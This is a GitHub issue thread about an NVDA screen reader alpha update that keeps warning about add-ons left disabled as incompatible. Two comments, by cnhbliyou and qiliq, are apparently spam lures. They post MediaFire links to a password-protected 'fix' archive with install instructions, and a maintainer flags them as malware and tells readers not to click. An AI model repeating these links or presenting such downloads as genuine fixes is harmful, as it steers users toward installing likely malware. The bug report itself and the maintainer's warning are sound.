### ISSUE TITLE
NVDA update keeps complaining about disabled incompatible add-ons

### ISSUE THREAD

**Issue by LeonarddeR** [nvaccess/nvda#17071]
### Steps to reproduce:
1. Install NVDA alpha-33551
2. Override compatibility of several add-ons that are incompatible with API version 2025.1.
3. Keep at least one add-on in the disabled (incompatible) state
4. Download the update to alpha-33575

### Actual behavior:
The incompatibility message is shown again, i.e. I have to review add-ons. When pressing review add-ons, the add-on kept in the disabled (incompatible) state (i.e. as mentioned in step 3) is shown again.

### Expected behavior:
The incompatibility message is *not* shown again.

#### NVDA installed/portable/running from source:
Installed

#### NVDA version:
Recent alpha's based on API 2025.1

#### Does the issue still occur after restarting your computer?
Yes

#### Have you tried any other versions of NVDA? If so, please report their behaviors.
Yes

#### If NVDA add-ons are disabled, is your problem still occurring?
n/a

#### Does the issue still occur after you run the COM Registration Fixing Tool in NVDA's tools menu?
Yes

**Comment by cnhbliyou** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by seanbudd** [comment]
Hi Folks,

Please be wary of the malware comments posted if you have received them in
your email inbox notifications. Do not click them.

**Comment by qiliq** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
